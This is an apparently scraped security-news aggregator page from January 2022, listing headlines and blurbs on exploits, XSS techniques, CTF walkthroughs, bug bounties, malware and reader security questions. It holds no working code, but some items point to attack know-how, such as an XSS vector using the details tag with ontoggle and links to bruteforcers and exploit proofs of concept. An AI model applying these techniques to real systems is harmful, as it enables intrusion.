    Hello guys, i need help! Basically, a friend of mine mistakenly submitted the wrong assignment (zip file), later on he realized and emailed the teacher explaining the situation and attaching the right assignment (zip file) creation and modification date as a proof. The teacher says that anyone can revert the os date and zip the file resulting in unauthentic creation date of zip file. My friend wants to find a method to prove to the teacher that the right assignment (zip file) was done on time and its creation date & modification date is authentic. My friend uses windows 10 and is in desperate need of help. Any help will be deeply appreciated. submitted by /u/themidfinger007 [link] [comments]  ( 2 min )
    FORENSIC SOFTWARE RECOMMENDATION
    submitted by /u/tsipikau [link] [comments]  ( 1 min )
  • Open

    Zooming in on Zero-click Exploits (Project Zero)
    submitted by /u/albinowax [link] [comments]
    A Beginner’s guide into Router Hacking and Firmware Emulation
    submitted by /u/secnigma [link] [comments]
    Vulnerable AWS Lambda function - Initial access in cloud attacks
    submitted by /u/MiguelHzBz [link] [comments]
    Telenot Complex: Insecure AES Key Generation
    submitted by /u/0xdea [link] [comments]
    Dahua DVRs and Webcams bruteforcer at port 37777
    submitted by /u/falx1fer [link] [comments]
    Robust and blazing fast open-redirect vulnerability scanner with ability of recursevely crawling all of web-forms, entry points, or links with data.
    submitted by /u/falx1fer [link] [comments]  ( 1 min )
    Mixed Messages: Busting Box’s MFA Methods | Varonis
    submitted by /u/VaronisThreatLabs [link] [comments]
    How to securely implement TLS certificate checking in Android apps
    submitted by /u/Masrepus [link] [comments]  ( 1 min )
    An attempt to understand container runtime
    submitted by /u/alt-glitch [link] [comments]  ( 1 min )
    Public exploit POC for critical windows http RCE impacting multiple windows versions
    submitted by /u/markcartertm [link] [comments]  ( 2 min )
    Stealing administrative JWT's through post auth SSRF - VMWare Workspace One Access (CVE-2021-22056)
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Destructive malware targeting Ukrainian organizations
    submitted by /u/SCI_Rusher [link] [comments]
    How to Analyze Malicious Microsoft Office Files
    submitted by /u/dmchell [link] [comments]
  • Open

    CALISHOT 2022-01: Find ebooks among 373 Calibre sites this month
    Happy New Year, Folks ! Here is the fresh new snapshot of the working calibre servers. Some minor improvements are coming with it: The sizes are now displayed The links to the covers are also provided. It's useful as you may know that a book is unavailable in realtime if the cover is empty, without having to click on the book link. ​ ANNOUNCEMENT: The calibre story started 2 years ago and during this long travel another sub more focused on this kind of content has been created for some various reasons. For this new year, I've decided to stop sharing the calishots in the current sub. If you're still interested in future dumps you can track them on the other one. Other resources will be proposed on it soon, like a wiki, tips, the datasets, original calibres, and some news about related tools like calisuck, calishot ... which are now turning into a single new project and will be released soon. Your contributions are also welcome on the sub. submitted by /u/krazybug [link] [comments]  ( 1 min )
    Help with scraping website with static .htm's (without sitemap)
    Hi Reddit, I've been trying to download this website (Cisco RV325 Emulator - Emulator) for full offline usage, and have used a variety of different tools with little success so far. I know it can be done because people have linked zip file downloads for other emulators in the cisco forums. I've tried wget, httrack, archivebox and several online website downloaders, however the problem I'm facing is as follows: If I download https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/default.htm I can load up the page locally but clicking on any of the menu items does nothing. It is just a static page which looks correct but isn't functional. I've tested winhttrack and wget settings of (-m -k) (-r -np -c) and another which uses (-l0) but I can't remember what the rest of the args were. From inspecting some of the urls using the online working version, I can see that each menu item has its own unique .htm page, which can be opened separately (online) if you just wanted to view that page and not be able to traverse to other pages (there is no menu bar). For example: Main Page - https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/default.htm Using the sidebar to go from Homepage > Port Management > Port setup, the online url is unchanged but clearly a separate static page for it exists because you can go to https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/lan_setting.htm and access the same thing (only that page's settings, not anything else) This means that if I downloaded this lan_setting.htm page and pointed to it in the local html, I should be able to access it right? The problem is that I don't know how to find all of these individual settings .htm page urls, and downloading them all manually and setting up local links in the main html file would take forever. ​ I hope I've explained this well enough, please accept my apologies in advance if I haven't ! submitted by /u/prymenumba [link] [comments]  ( 2 min )
    Worthy Bookmark: The Latest Google Dorks List - Jan 2022 DB Update
    submitted by /u/little_maggot [link] [comments]
  • Open

    Russian Roulette: Using Optical Character Recognition to investigate military equipment transfers
    What can we learn about Russian equipment transfers from a single Twitter video? Quite a lot, actually. Continue reading on Medium »  ( 3 min )
    Solución reto #IMINT #OSINT
    Este writeup es la solución a un reto planteado por el profesor Gordon Farrer, para mí un referente en este campo y una persona de la que… Continue reading on Medium »  ( 3 min )
  • Open

    How To Run Or Install Hakrawler Bug Bounty Tool on Kali Linux
    Hakrawler : Tool used to gather URLs and JavaSript file locations. Continue reading on Medium »  ( 1 min )
    Bug Bounty Program — Earn Up to 100,000 PTP
    Learn more about bug bounty program. Continue reading on Platypus.finance »  ( 1 min )
    My Bug Bounty Adventure -1-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Introducing the Exponent Bug Bounty Program in Collaboration with Immunefi
    Website | Litepaper | Twitter | Medium | Discord | Bug Bounty Program Continue reading on Medium »  ( 3 min )
    Bug Bounty Recon: Content Discovery (Efficiency pays $)
    Content Discovery — The process of finding vulnerable endpoints; URLs, Parameters and Resources. Continue reading on Medium »  ( 5 min )
    The New King “Broken Access Control”
    The King (Injection Bug) who was ruling the bug world for more than a decade is now conquered by the New King known as “Broken Access… Continue reading on Medium »  ( 1 min )
    Cross Site Port Attack in Wild
    Hello Hunter, Sorry for the delay of post and this is my first post in this year, I hope you’re all doing well and happy. So without… Continue reading on Medium »  ( 2 min )
  • Open

    Facing DevSecOps hurdles, federal agencies need a modern approach to security
    Increased threats mean the government can’t sleep on cybersecurity. Learn how federal agencies can improve their security posture without sacrificing innovation. READ MORE  ( 4 min )
  • Open

    SecWiki News 2022-01-18 Review
    以色列“飞马”间谍软件攻击事件的综合分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-18 Review
    以色列“飞马”间谍软件攻击事件的综合分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Go: Getting Started with Fuzzing
    Article URL: https://go.dev/doc/tutorial/fuzz Comments URL: https://news.ycombinator.com/item?id=29980566 Points: 1 # Comments: 0  ( 11 min )
  • Open

    The Tale of a Click leading to RCE
    In today’s industry, we often hear that humans may weaken a company’s security leading to a potential breach. At ManoMano we highly… Continue reading on ManoMano Tech Team »  ( 11 min )
  • Open

    Top 5 Best Fuzzing & Vulnerability Research TIPS
    submitted by /u/pat_ventuzelo [link] [comments]
    Rust vs. C: How are vulnerabilities different? An analysis on the vulnerabilities in the two programming languages and what to look for.
    submitted by /u/ragnarsecurity [link] [comments]  ( 1 min )
  • Open

    网络犯罪案例分析-12306抢票产业链
    买卖公民信息、开发注册软件,触犯侵犯公民个人信息罪和提供侵入计算机信息系统程序罪,判处有期徒刑三年,追缴违法所得。  ( 1 min )
    专访数字认证夏鲁宁:密码+云,解锁更多安全服务模式
    当传统的密码技术和热门的“云”相遇在一起,密码技术将焕发更强大的活力,给企业带来更多的优势。  ( 1 min )
    任天堂向用户发出警告,警惕虚假网站的Switch折扣
    这些网站使用官方标志来欺骗任天堂用户及粉丝,误以为这是官方页面,并以大幅折扣为诱饵,购买极有可能是“假货”的任天堂产品。
    2021年物联网设备CVE天梯榜
    作为一家专注于物联网安全的公司,统计了以下品牌部分评分较高的CVE编号以及描述等。  ( 2 min )
    研究人员在三种WordPress插件中发现高危漏洞
    WordPress安全公司Wordfence发现一项严重的漏洞,它可以作用于三种不同的WordPress插件,并已影响超过84000个网站。  ( 1 min )
    什么是SASE(安全访问服务边缘),一图看懂概念和应用场景
    这么火爆的SASE,一图看懂
    「网安知识大陆」有奖意见征集 | 一起来找“茬”
    知识大陆有奖收集意见反馈啦~  ( 1 min )
    FreeBuf早报 | Oracle在1月修复483个漏洞;Chrome 限制网站对专用网络直接访问
    2022年1月Oracle重要补丁更新 (CPU) 指出,Oracle安全更新将解决483个新的安全补丁,重要补丁更新是针对多个安全漏洞的补丁集合。  ( 1 min )
    2027 年零信任安全市场规模将达到 644 亿美元
    作为世界第二大经济体中国预计到2027年将达到111亿美元的市场规模。  ( 1 min )
    Linux环境中的三大恶意软件
    Linux系统通常部署在物联网设备中,最常见的是利用物联网设备进行DDoS攻击。其中前三大恶意软件是XorDDoS、Mirai和Mozi。  ( 1 min )
    苹果 Safari浏览器新漏洞敲响跨站用户跟踪的警钟
    防欺诈软件公司 FingerprintJS 日前披露, Safari 15中的IndexedDB API执行漏洞已经被恶意网站利用。  ( 1 min )
  • Open

    SeeYouCM-Thief: Exploiting common misconfigurations in Cisco phone systems
    1.1      Intro I spent my early IT career working for a Cisco partner that specialized in Cisco phone systems. My work wasn’t directly with the phone systems, but it was usually in an adjacent field like route/switch and security. I did, however, get to see my share of networks that used Cisco phone systems. Today,... The post SeeYouCM-Thief: Exploiting common misconfigurations in Cisco phone systems appeared first on TrustedSec.  ( 5 min )
  • Open

    SSRF vulnerability in VMware authentication software could allow access to user
    Article URL: https://portswigger.net/daily-swig/ssrf-vulnerability-in-vmware-authentication-software-could-allow-access-to-user-data Comments URL: https://news.ycombinator.com/item?id=29978942 Points: 3 # Comments: 0  ( 4 min )
  • Open

    XSS With Hoisting
    When dealing with JavaScript injection scenarios sometimes we might get into a difficult situation: the target page is not meant to be accessed directly and some of its code is supposed to use some other code in the setup intended. That leads to some broken script blocks and when the injection context is one of … Continue reading XSS With Hoisting The post XSS With Hoisting appeared first on Brute XSS.
  • Open

    IT Security in Web Anwendungen I — Injections
    Bausteine vieler Dienste dar. Insbesondere die strategische Ausrichtung vieler Unternehmen in die Cloud unterstreicht die kritische… Continue reading on Medium »  ( 3 min )
  • Open

    Newark Academy CTF (NACTF) 2021 — Challenge Writeups
    This post contains writeups for some challenges in this CTF.  ( 3 min )
    How to make our own CTF Challenge with ease.
    Hi infosec people, hope you’re healthy! I just got enough time to write a blog on the topic which I really wanted to write, “You can also…  ( 16 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here.  ( 4 min )
    Day 13, Introduction to Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 12, Click Here Or Click Here  ( 5 min )
    [Day 4] Web Exploitation Santa’s Running Behind | Advent of Cyber 3 (2021)
    Burp suite practices  ( 3 min )
    [Day 3] Web Exploitation Christmas Blackout | Advent of Cyber 3 (2021)
    As a penetration tester or defender, we must have an ability to look at the missing or something hidden. And today we will be learning…  ( 2 min )
    Shibboleth: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add shibboleth.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
    c4ptur3-th3-fl4g (TryHackMe)
    Task 1  ( 5 min )
    Authentication Bypass -TryHackMe
    Writeup  ( 3 min )
    SSH to Red Hat with Docker
    Make a docker container with Red Hat and ssh into it  ( 3 min )
  • Open

    Newark Academy CTF (NACTF) 2021 — Challenge Writeups
    This post contains writeups for some challenges in this CTF.  ( 3 min )
    How to make our own CTF Challenge with ease.
    Hi infosec people, hope you’re healthy! I just got enough time to write a blog on the topic which I really wanted to write, “You can also…  ( 16 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here.  ( 4 min )
    Day 13, Introduction to Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 12, Click Here Or Click Here  ( 5 min )
    [Day 4] Web Exploitation Santa’s Running Behind | Advent of Cyber 3 (2021)
    Burp suite practices  ( 3 min )
    [Day 3] Web Exploitation Christmas Blackout | Advent of Cyber 3 (2021)
    As a penetration tester or defender, we must have an ability to look at the missing or something hidden. And today we will be learning…  ( 2 min )
    Shibboleth: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add shibboleth.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
    c4ptur3-th3-fl4g (TryHackMe)
    Task 1  ( 5 min )
    Authentication Bypass -TryHackMe
    Writeup  ( 3 min )
    SSH to Red Hat with Docker
    Make a docker container with Red Hat and ssh into it  ( 3 min )
  • Open

    Newark Academy CTF (NACTF) 2021 — Challenge Writeups
    This post contains writeups for some challenges in this CTF.  ( 3 min )
    How to make our own CTF Challenge with ease.
    Hi infosec people, hope you’re healthy! I just got enough time to write a blog on the topic which I really wanted to write, “You can also…  ( 16 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here.  ( 4 min )
    Day 13, Introduction to Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 12, Click Here Or Click Here  ( 5 min )
    [Day 4] Web Exploitation Santa’s Running Behind | Advent of Cyber 3 (2021)
    Burp suite practices  ( 3 min )
    [Day 3] Web Exploitation Christmas Blackout | Advent of Cyber 3 (2021)
    As a penetration tester or defender, we must have an ability to look at the missing or something hidden. And today we will be learning…  ( 2 min )
    Shibboleth: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add shibboleth.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
    c4ptur3-th3-fl4g (TryHackMe)
    Task 1  ( 5 min )
    Authentication Bypass -TryHackMe
    Writeup  ( 3 min )
    SSH to Red Hat with Docker
    Make a docker container with Red Hat and ssh into it  ( 3 min )
  • Open

    DOM XSS through ads
    Urban Dictionary disclosed a bug submitted by bemodtwz: https://hackerone.com/reports/889041

  • Open

    Chrome에선 이제 open 속성없이 XSS가 가능합니다.
    XSS가 가능합니다." />XSS 벡터 중 details 태그에 ontoggle 이벤트 핸들러와 open 속성을 이용한 방법이 있습니다. Chrome, Safari, Firefox, IE 모두 사용 가능하고 on* 기반의 XSS 중 비교적 쉽게 사용자 interaction을 줄일 수 있어서 자주 사용되는데요. test 최근 크롬 97 업데이트에 새로운 기능이 추가됬는데 바로 Auto-expand details elements 입니다. 직역하면 details elements에서 자동으로 expand 처리한다는 의미이고 이는 open 속성을 사용하지 않더라도 ontoggle로만 즉시 스크립트를 실행할 수 있다는 것을 의미합니다.
    안녕 Authz0, Authorization 테스트를 위한 새로운 도구 🚀
    저는 Authorization 테스트 시 ZAP의 Zest Script를 즐겨서 사용합니다. 예전에는 Burpsuite에서 Authz라는 Extension을 자주 사용했었구요. 어쩄던 이 도구들은 ZAP과 Burpsuite에 내장되어 사용되기 때문에 HTTP Raw Request를 사용할 수 있다는 엄청난 강점이 있지만, 반대로 너무 디테일한 기능과 Raw Reqeust의 필수 사용으로 인해 반대로 심플한 작업에서는 약간 불편함이 생기기 마련입니다. 그래서 지난주 주말부터 Authorization 테스트를 위해 도구를 하나 만들었고, 일요일 낮에 릴리즈하여 살짝 공유드려볼까 합니다. 오늘 소개해드릴 도구는 바로 Authz0입니다. What is Authz0 Authz0는 YAML 포맷 기반의 Template 파일을 중심으로 테스트할 URL과 Role을 구성하고, 이를 기반으로 스캔할 수 있는 도구입니다.
  • Open

    Is Google Authenticator impenetrable?
    Title is hyperbole obviously. Out of different 2FA methods SMS was weak because you could get sim swapped Authy was weak because a hacker could switch it to their phone if they could get into your email. GA can't be moved from phone to phone so it can't be taken over by hacker who gets access to your sim card and email. My impression is that any account protected by GA is safe. Why is this wrong? submitted by /u/iExtrapolate314 [link] [comments]  ( 1 min )
    What is "round tripping" in HTML/GO?
    ELI5 if you can. I'm leaning so much from you guys! Thank you! submitted by /u/iExtrapolate314 [link] [comments]
    Newly created InfoSec role within IT department - what should I be doing to get it right?
    Hello AskNetSec! I'm not sure how else to word the title, so hopefully it's acceptable. Basically, I have been working in different facets of IT for 14 years. My current role is within IT operations as a systems engineer, but it's possibly evolving to be the first true role with an official information security component within the IT department at my company. I'm excited because I've always enjoyed the security aspects of my roles over my career, and my formal education was focused on information security. However, I recognize that I have no formal work experience in a security-specific role, and as such I feel like I'm "winging it". I don't really know what a formalized incident response looks like within an established security department. I don't know what tools I have at my disposal, or should have at my disposal, to do my job effectively. I also realize that I may be overthinking it. But truthfully, I have no point of reference. So I come to you all and ask for some opinions and insights to navigate as the sole person with these newly added responsibilities that I would liken to a security analyst, and do so in a way that makes sense and is effective. I'm happy to do my own reading and self-learning (I have access to PluralSight, if that would be useful), but also hoping maybe someone with experience can give some practical pointers and/or high-level procedural advice since I will likely be shaping this new role in coordination with my management. Thank you all in advance! Edited because my brain moved faster than my fingers could type :( submitted by /u/unseenspecter [link] [comments]  ( 5 min )
    How to create a rule that allows only one country with ModSecurity
    Hi all, Does anyone know how to write a rule for ModSecurity to only allow access to a website from one country? I'm currently using this rule: SecGeoLookupDb /usr/share/GeoIP/GeoIP.dat SecRule REMOTE_ADDR "@geoLookup" "chain,id:22,drop,msg:'Non-GB IP address'" SecRule GEO:COUNTRY_CODE "!@streq GB" Which is save in the rules directory as: modsecurity_crs_15_customrules.conf And I have also changed the owner of /usr/share/GeoIP/GeoIP.dat http for nginx. But the website is still getting traffic from outside of UK. Any help and pointers would be greatly appreciated. submitted by /u/Rurisk89 [link] [comments]  ( 1 min )
    Small business honeypot recommendations?
    I started working internal IT for a small business late last year who had been ransomed twice. Their (soon to be) ex MSP still had RDP open to the world, so no wonder... Anyway, among the many other projects currently running I'm considering setting up some honeypots for additional protection. The business still has a number of accounts with weak password tied to their applications so will be while before they're sorted out. Is this something that would be worthwhile? Any what tools have you used/would recommend? I'm looking for open source if/where possible. Thank you in advance :D submitted by /u/brettfk [link] [comments]  ( 1 min )
    Can HTTPS web traffic over a VPN be intercepted & decrypted if the router the PC is connected to is compromised? Can an attacker do this with tools available on a smartphone?
    submitted by /u/ferengiprophet [link] [comments]  ( 1 min )
    Can I make ensure a pdf is clean by "printing to pdf" before sending?
    I want to email a pdf I downloaded from Library Genesis. It's an old scanned book I couldn't find anywhere else. I need to share it, but on the off chance there's anything malicious there, is there anything I can do to send a "cleaned" version? If I create a new pdf by printing to pdf, would that be safe? submitted by /u/sonsa_geistov [link] [comments]  ( 1 min )
    What is an XSS injection? How is it used? What vulnerabilities does it create?
    Also, someone elsewhere on the internet claimed that XSS can get around Cloudflare. How? submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
  • Open

    Lots of movies and TV shows in the "disk" folders, download speed is decent
    submitted by /u/feelingsupersonic [link] [comments]  ( 1 min )
    Browser Extension for Saving Images As While Browsing
    Before you tell me to just shill for a VPS, run a crawler and some scripts; I would like to offer some insight. I like collecting old web GIFs and pixel art. These are typically from websites which are hardly active, or in some cases no longer online. Places other people would, usually, share on r/opendirectories. Ergo, whenever I pick these out it's already going to be a manual process. I suppose I can just right click + save as, a few hundred times, but I have found Pinterest's "Save Button" to also be convenient. It's an extension that scans the entire page quickly, and you can choose what to save through a convenient menu, and it even builds a gallery for me. I want to reshare these, so I don't consider it a violation of my privacy that they are being exposed under my account name. False Account Suspensions aren't unheard of, but it's been working for me so far. Except whenever I need to save any image smaller than 100x100 pixels. Pinterest has a restriction requiring all images to be above 100x100 in resolution, so in this case you have to Save As, pad out the background and then upload. Which is again, a level of tedium I would like to avoid. So, would any of you lovely folks happen to know any decent alternatives? submitted by /u/themadprogramer [link] [comments]  ( 3 min )
    The chiptune archive is back!
    Hey all, it's been a long time. I had my chiptune archive brought down because of the domain, and now it's back, under my own domain. The link is https://chiparchive.com/files if you all want to talk to me on twitter. It's https://twitter.com/thechiptunearc1 submitted by /u/jreina2002 [link] [comments]
  • Open

    Critical XSS in chrome extension
    Chrome extensions have a feature to inject content scripts containing JavaScript code in a web page. By using the standard Document Object… Continue reading on Medium »  ( 2 min )
    Bug Bounty Hunting
    You might wonder what this bug bounty hunting is. Is it hunting bugs or what? Well certainly its you hunting down bugs but not the ones we… Continue reading on Medium »  ( 2 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here. Continue reading on InfoSec Write-ups »  ( 3 min )
    IDOR leads to 2fa Bypass
    Hello Everyone my name is Arth Bajpai and , I’m back with my another writeup Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - SQL INJECTION LAB ÇÖZÜMLERİ
    PortSwigger Web Security, web güvenliği zafiyetlerini barındıran, Owasp top 10 zafiyetlerinin yer aldığı laboratuvarlardan oluşan bir web… Continue reading on Medium »  ( 15 min )
    Jobs in Cybersecurity
    hello guys, are you excited to learn cybersecurity or ethical hacking ,You are curious about how things work and have thirst in learning… Continue reading on Medium »  ( 3 min )
    My Pentest Log -3-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
  • Open

    SSRF & Blind XSS in Gravatar email
    Automattic disclosed a bug submitted by rockybandana: https://hackerone.com/reports/1100096 - Bounty: $750
    Clickjacking
    Palo Alto Software disclosed a bug submitted by paramdham: https://hackerone.com/reports/688546
  • Open

    Registry Analysis - The "Why"
    Why is Registry analysis important? The Windows Registry, in part, controls a good bit of the functionality of a Windows system. As such, Registry analysis can help you understand why you're seeing something, or why you're not seeing something, as the case may be. For example, Registry "settings" (i.e., keys, values, or combinations) can be/have been used to disable Windows Event Logs, enable or disable auditing (the content that goes into the Windows Event Log), disable access to security tools, enable or disable other functionality on Windows systems, etc. The Registry can be used to enable or disable application prefetching, which produces artifacts very commonly used by forensic analysts and incident responders. Most analysts are aware that, particularly with respect to the file sy…  ( 7 min )
  • Open

    Analyzing Binaries with Radare2
    submitted by /u/DLLCoolJ [link] [comments]
    Attacking RDP from Inside: How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    Domain Persistence – Machine Account
    submitted by /u/netbiosX [link] [comments]
    zimawhit3/HellsGateNim: A quick example of the Hells Gate technique in Nim
    submitted by /u/dmchell [link] [comments]
  • Open

    Show HN: InternetDB API – Fast IP Lookups for Port and Vulnerability Information
    Article URL: https://internetdb.shodan.io Comments URL: https://news.ycombinator.com/item?id=29970480 Points: 2 # Comments: 0
    Same-origin violation vulnerability in Safari 15 could leak a user’s website
    Article URL: https://portswigger.net/daily-swig/same-origin-violation-vulnerability-in-safari-15-could-leak-a-users-website-history-and-identity Comments URL: https://news.ycombinator.com/item?id=29968460 Points: 37 # Comments: 13  ( 4 min )
  • Open

    Capturing RDP NetNTLMv2 Hashes: Attack details and a Technical How-To Guide - GoSecure
    submitted by /u/obilodeau [link] [comments]
    Domain Persistence – Machine Account
    submitted by /u/netbiosX [link] [comments]
  • Open

    Algorithms for software testing
    submitted by /u/WillyRaezer [link] [comments]
  • Open

    SecWiki News 2022-01-17 Review
    Yasso: 强大的内网渗透辅助工具集 by ourren SecWiki周刊(第411期) by ourren 中国(大陆)虚拟货币犯罪形态分析报告-2021年度 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-17 Review
    Yasso: 强大的内网渗透辅助工具集 by ourren SecWiki周刊(第411期) by ourren 中国(大陆)虚拟货币犯罪形态分析报告-2021年度 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    DailyBugle TryHackMe Walkthrough
    Introduction DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and The post DailyBugle TryHackMe Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

    DailyBugle TryHackMe Walkthrough
    Introduction DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and The post DailyBugle TryHackMe Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

    ThinkPHP框架渗透实战
    thinkphp在开启debug模式下如果服务器开启了数据库外联,可以通过爆破mysql服务发送大量请求(让mysql堵塞)。  ( 1 min )
    FreeBuf早报 | 沃尔玛低调入局元宇宙;Safari 浏览器漏洞允许跨站点跟踪用户
    沃尔玛将向用户提供虚拟货币和NFT。  ( 1 min )
    国产计算机外设及信创产品安全竞赛,斗象荣获“优秀组织奖”
    斗象荣获2021年“网络安全众测平台”国产计算机外设及信创产品安全竞赛“优秀组织奖”
    冬奥会倒计时!斗象“网安保障军团”使命必达
    斗象科技为数十家央国企单位提供冬奥前的网络安全评估服务与冬奥期间的防守值守服务,全力保障冬奥会核心系统与网络资产的安全。
    《网络安全产业人才岗位能力要求》标准正式发布
    标准正文内容分为六个部分,包括标准的适用范围、规范性引用文件、涉及的术语和定义、主要方向及岗位、能力要素等多个方面。
    知名软件被利用,小心主机被开后门
    攻击者通过网络钓鱼的手段诱导受害者点击运行邮件中附带的木马程序,结合正常的Adobe CEF Helper程序进行攻击。  ( 1 min )
    什么是SSL剥离攻击?
    SSL剥离攻击是一种网络攻击,黑客攻击将Web连接从比较安全的HTTPS降级到不太.安全的HTTP。  ( 1 min )
    欧盟针对一家“虚拟”电力公司进行了网络攻击演习
    欧盟上周对芬兰一家“虚拟”电力公司进行了一次模拟网络攻击演习。
    全国信安标委征求国家标准《信息安全技术 重要数据识别指南》(征求意见稿)发布
    《指南》明确了“重要数据”的定义,是指以电子方式存在的,一旦遭到篡改、破坏、泄露或者非法获取、非法利用,可能危害国家安全、公 共利益的数据。  ( 1 min )
    俄罗斯声称已经捣毁知名勒索软件团伙REvil
    俄罗斯联邦安全局(FSB)宣布已捣毁REvil勒索软件团伙,该团伙是针对大型组织(如Kaseya和JBS USA)的一系列攻击的幕后黑手。
    2022年网络安全趋势:7个趋热,2个趋冷
    2022 年的九大安全趋势,预计在新的一年里攻击的范围和复杂程度将会变得更加难以应对。  ( 1 min )
    聚类算法有哪些?又是如何分类?
    想要了解聚类算法并对其进行区别与比较的话,最好能把聚类的具体算法放到整个聚类分析的语境中理解。  ( 1 min )
    2020及2021年常被利用的30个软件漏洞
    对于所有的0day,定制的恶意软件和其他完全未知的安全漏洞,它们已经存在多年并被广泛利用。  ( 1 min )
  • Open

    Android Application Malware Analysis
    submitted by /u/Apprehensive_Gap6036 [link] [comments]  ( 1 min )
  • Open

    Ejecución dinámica con DInvoke
    Tras varios meses de desarrollo y una vez añadidas las últimas funcionalidades al proyecto, creo que Dinvoke_rs está preparado para que… Continue reading on Medium »  ( 7 min )
  • Open

    Domain Persistence – Machine Account
    Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation.… Continue reading → Domain Persistence – Machine Account  ( 6 min )
    Domain Persistence – Machine Account
    Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation.… Continue reading → Domain Persistence – Machine Account  ( 6 min )
  • Open

    Domain Persistence – Machine Account
    Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation.… Continue reading → Domain Persistence – Machine Account  ( 6 min )
    Domain Persistence – Machine Account
    Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation.… Continue reading → Domain Persistence – Machine Account  ( 6 min )
  • Open

    My Pentest Log -3-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
  • Open

    My Pentest Log -3-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )

  • Open

    How do cryptocurrency exchanges like Coinbase defend against man in the middle attacks (MItM)?
    Referring specifically to applications like Evilginx that create fake log in pages and collect session cookies. A session cookie is what the website gives you after you complete signing in (username + password + 2FA) to remember that you did. The tool collects this cookie and passes it to the hacker if you're foolosh enough to use their fake log in page. Do Coinbase, Binance, etc have any protections in place to defend against this? Inb4 don't be stupid: some people are stupid. They deserve to not be robbed. submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Just completed my Security+.What's should I do next
    Just completed my Security+ and not sure what I should do next.Interested more in Blue team than red team. submitted by /u/Linux98 [link] [comments]  ( 1 min )
    Facebook lite app whitehat settings guide
    Hi, I'm trying to follow Facebook guide to intercept Facebook lite android application which uses binary protocol instead of http. I'm using burp on linux. The section is called "Enable settings from Facebook Lite on Android" https://www.facebook.com/whitehat/education/testing-guides I'm stuck with NoPE Proxy extension which intercept traffic. The enable checkbox can't be checked, even if I launched burp as root. https://i.ibb.co/1TN0jgz/1.png In wireshark I get, port unreachable after I set my phone dns to my machine IP as mentioned in fb guide. https://i.ibb.co/q0vfStt/2.png Help, please! I want to intercept Facebook lite android application traffic ! submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    Information Security Analyst questions
    Is Information Security Analyst the same as Cyber Security? Can I work in Information Security and be Information Security Analyst with bachelor IT degree plus certifications? Can I work in Cyber Security field and be Cyber Security with bachelor IT plus certifications? Can I get into Information Security Analyst and/or Cyber Security field without a degree at all? What certifications you guys recommend? I am thinking doing CompTIA Security+, but first I need to get training going: https://www.comptia.org/training/by-certification/security What is your salary, experience year, and state? Anyone live in FL and doing Information Security Analyst can give me insight of this job market situation in FL. Is it bad? How is the pay? What do you do in this field? Is it hard? Is this career good though? submitted by /u/OlympicAnalEater [link] [comments]  ( 3 min )
    Endpoint security confusion
    I have heard a lot of fuss going around regarding endpoint security. Having a background in IT development, I figured that this is what was meant: Https://somepage.com /login.php <--- endpoint But after a little bit of googling it sounds like it has nothing to do with endpoints. Could somebody explain this to me? Or what to search for? submitted by /u/kusichta [link] [comments]  ( 2 min )
    Do you include CVEs on your resume?
    If you have “accredited” CVEs how do you list them on your resume? Do you link to the NIST website or to a security advisory with your name in it? Thoughts? submitted by /u/BadCSCareerQuestions [link] [comments]  ( 1 min )
  • Open

    You're running untrusted code!
    submitted by /u/nfrankel [link] [comments]  ( 1 min )
    Free copy of The ssh Plumber's Handbook
    submitted by /u/markcartertm [link] [comments]  ( 2 min )
  • Open

    Previse HackTheBox Walkthrough
    Introduction Previse is a CTF Linux box with difficulty rated as “easy” on the HackTheBox platform. The machine covers bypassing access control, OS command injection, The post Previse HackTheBox Walkthrough appeared first on Hacking Articles.  ( 5 min )
  • Open

